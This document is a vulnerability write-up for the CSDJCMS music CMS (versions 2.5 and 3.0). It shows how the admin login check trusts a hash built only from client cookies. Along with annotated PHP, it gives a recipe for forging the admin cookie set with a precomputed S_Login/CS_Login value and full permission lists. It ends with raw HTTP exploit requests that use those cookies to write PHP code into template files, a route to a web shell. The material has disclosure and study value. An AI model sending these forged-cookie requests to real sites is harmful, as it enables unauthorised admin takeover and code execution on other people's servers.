CSDJCMS vulnerability: admin backend authentication bypass leading to a shell
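// index.php (CSDJCMS v2.5). Reconstructed from a whitespace-mangled paste:
// "$ cache_id" is read as "$cache_id", and the lone "=" in the conditions
// ("S_IsInstall = 0", "S_Webmode = 1") as the comparison "==" the control
// flow needs (assigning to a constant would not even parse).
include_once("include/install.php");
if (S_IsInstall == 0) {
    header("Location: install/install.php");
    exit; // without this the rest of the page still runs behind the redirect
}
include_once("include/label.php");
if (S_Webmode == 1 || !file_exists("index.html")) {
    // Cache area: render index.html through the page cache ($cache_opt comes
    // from the includes above; start() presumably returns true on a cache hit).
    $cache_id = 'index_';
    if (!$cache_opt->start($cache_id)) {
        echo GetTemp("index.html", 0);
        $cache_opt->end();
    }
} else {
    header("Location: index.html");
    exit;
}

/**
 * Reads one request parameter for "safe" use: trims it and, unless
 * magic_quotes_gpc already escaped it, applies addslashes().
 *
 * SECURITY: addslashes() is not a substitute for parameterised queries; a
 * caller that builds SQL from this value is still exposed to charset-based
 * injection. Treat the return value as untrusted text.
 *
 * @param string $key      Parameter name.
 * @param string $mode     'post' or 'get'; any other value reads POST first and
 *                         falls back to GET when the POST value is empty.
 * @param string $isfilter Non-empty to additionally run lib_replace_end_tag()
 *                         (defined in the project's include files) on the value.
 * @return string '' when the parameter is absent or not a scalar string.
 */
function SafeRequest($key, $mode, $isfilter = '')
{
    // set_magic_quotes_runtime() was removed in PHP 7.0 and get_magic_quotes_gpc()
    // in 8.0; guard both so the helper does not fatal on a current interpreter,
    // where no magic quoting exists and addslashes() must always be applied.
    if (function_exists('set_magic_quotes_runtime')) {
        set_magic_quotes_runtime(0);
    }
    $magic = function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : false;

    switch ($mode) {
        case 'post':
            $value = _safe_request_read($_POST, $key, $magic);
            break;
        case 'get':
            $value = _safe_request_read($_GET, $key, $magic);
            break;
        default:
            $value = _safe_request_read($_POST, $key, $magic);
            if ($value === '') {
                $value = _safe_request_read($_GET, $key, $magic);
            }
            break;
    }
    if ((string) $isfilter !== '') {
        $value = lib_replace_end_tag($value);
    }
    return $value;
}

/**
 * Returns the trimmed, slash-escaped value of $source[$key], or '' when the
 * key is unset or not a string (an array parameter such as key[]=x would
 * otherwise make trim() fail). With magic quotes active the input is already
 * escaped, so only trim() runs.
 */
function _safe_request_read(array $source, $key, $magic)
{
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return '';
    }
    $value = trim($source[$key]);
    return $magic ? $value : addslashes($value);
}

// Every admin page starts with these includes; after reading the source for
// half a day the serious problem turned out to be in admin_loginstate.php,
// whose content follows.
include "../include/conn.php";
include "../include/function.php";
include "admin_version.php";
include "admin_loginstate.php";

// --- admin_loginstate.php ---
// SECURITY: this is the login check every backend page relies on. Both sides
// of the comparison are built only from cookies the client sends, so a client
// that sets S_AdminID, S_AdminUserName, S_AdminPassWord and S_Permission and
// computes S_Login = md5() of those four passes without ever authenticating.
// The check must validate against server-side state (session or database),
// never recompute a hash of client-supplied values.
if (empty($_COOKIE['S_AdminID'])) {
    // No admin id cookie at all: send the browser to the login page.
    echo "<script>window.location='admin_login.php'</script>";
    exit; // the original fell through and kept rendering the admin page
}
$loginInput = '';
foreach (['S_AdminID', 'S_AdminUserName', 'S_AdminPassWord', 'S_Permission'] as $name) {
    $loginInput .= isset($_COOKIE[$name]) ? $_COOKIE[$name] : '';
}
$loginCookie = isset($_COOKIE['S_Login']) ? $_COOKIE['S_Login'] : '';
// Strict comparison: "!=" on two numeric-looking strings (hashes starting with
// "0e") compares them as numbers and treats different hashes as equal.
if ($loginCookie !== md5($loginInput)) {
    echo "<script>window.parent.location='admin_login.php'</script>";
    exit;
}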
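/**
 * Backend permission check (v2.5): aborts the request unless $Column is one
 * of the comma-separated entries of the S_Permission cookie.
 *
 * SECURITY: the permission list is read straight from a client cookie, so any
 * caller can grant itself every permission; the list must come from
 * server-side session state or the database, not from the request.
 *
 * @param int|string $Column Permission id to require.
 * @return void Returns only when the permission is present; otherwise die()s
 *              with a jAlert() script that sends the browser back one page.
 */
function SystemPer($Column)
{
    $denied = "<script>jAlert('Sorry, you are not authorized to perform this operation!', 'Operation error', function(R){window.location='javascript:history.go(-1)';})</script>";
    if (empty($_COOKIE['S_Permission'])) {
        die($denied);
    }
    // The list is "," separated. Compare as strings after an explicit cast so
    // ids 5 and "5" still match, without the loose "==" numeric-string rules;
    // the original's "if ($StateOK = 0)" assigned instead of compared and so
    // never reached the deny branch.
    $granted = explode(',', $_COOKIE['S_Permission']);
    if (!in_array((string) $Column, $granted, true)) {
        die($denied);
    }
}

// Why the check is bypassable: every value hashed into S_Login comes from the
// same client, so a forged cookie set passes both admin_loginstate.php and
// SystemPer():
//   S_Permission    = 1,2,...,9,10,11,12,13,14,15 (the full permission list)
//   S_Login         = md5(S_AdminID . S_AdminUserName . S_AdminPassWord . S_Permission)
//   S_AdminUserName = 1
//   S_AdminPassWord = 1
//   S_AdminID       = 1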
The admin backend check is bypassed successfully.
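<?php
# Name: PHP version of Cheng's music CMS management system v3.0
# Author: Cheng's <web@chshcms.com> [QQ: 848769359]
# Homepage: http://www.chshcms.cn/
#
# Version 3.0 has the same forgeable login-state check as 2.5; only the cookie
# names changed (CS_AdminID, CS_AdminUserName, CS_AdminPassWord, CS_Quanx,
# CS_Login). Reconstructed from a whitespace-mangled paste.

// Locate the admin directory from the script path so the redirect lands on
// its login page. SECURITY: PHP_SELF can carry client-supplied PATH_INFO, so
// $CS_Admin is not trustworthy inside the inline script below; the admin path
// should come from configuration rather than from the request.
$CS_Path     = $_SERVER['PHP_SELF'];
$CS_Pathall  = explode("/", $CS_Path);
$CS_Admin    = (isset($CS_Pathall[1]) ? $CS_Pathall[1] : '') . "/";
$CS_LoginUrl = CS_WebPath . $CS_Admin . "login.php";

if (empty($_COOKIE['CS_AdminID'])) {
    echo "<script>window.parent.location='" . $CS_LoginUrl . "';</script>";
    exit; // the original kept rendering the page after emitting the redirect
}

// SECURITY: every input to this hash is a client cookie, so the client can
// compute a matching CS_Login itself; the check must be done against
// server-side session state, not by recomputing a hash of cookie values.
$loginInput = '';
foreach (['CS_AdminID', 'CS_AdminUserName', 'CS_AdminPassWord', 'CS_Quanx'] as $name) {
    $loginInput .= isset($_COOKIE[$name]) ? $_COOKIE[$name] : '';
}
$loginCookie = isset($_COOKIE['CS_Login']) ? $_COOKIE['CS_Login'] : '';
// Strict comparison: "!=" on two numeric-looking strings (hashes starting with
// "0e") compares them as numbers and treats different hashes as equal.
if ($loginCookie !== md5($loginInput)) {
    echo "<script>window.parent.location='" . $CS_LoginUrl . "'</script>";
    exit;
}

/**
 * Backend permission check (v3.0): aborts unless $Column is one of the
 * comma-separated entries of the CS_Quanx cookie (ids of the form "2_3").
 *
 * SECURITY: as with the login check, the permission list is client-supplied
 * and therefore forgeable; it must come from server-side state.
 *
 * @param int|string $Column Permission id to require.
 * @return void Returns only when permitted; otherwise die()s with an alert
 *              script that sends the browser back one page.
 */
function SystemPer($Column)
{
    $denied = "<script>alert('Sorry, you are not authorized to perform this operation!');window.location='javascript:history.go(-1);'</script>";
    if (empty($_COOKIE['CS_Quanx'])) {
        // die() already terminates; the original's trailing exit() was unreachable.
        die($denied);
    }
    // Strict string membership instead of the loose "==" loop; the original's
    // "if ($StateOK = 0)" assigned instead of compared and never denied.
    $granted = explode(",", $_COOKIE['CS_Quanx']);
    if (!in_array((string) $Column, $granted, true)) {
        die($denied);
    }
}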
Exploit request, v2.5:
Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/admin_t ... ;file=artindex.htmlCookie: S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 169FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5
------------------------------------------ Exploit request, v3.0:
Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/skins/s ... ;name=cs-bottom.phpCookie: CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 57name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E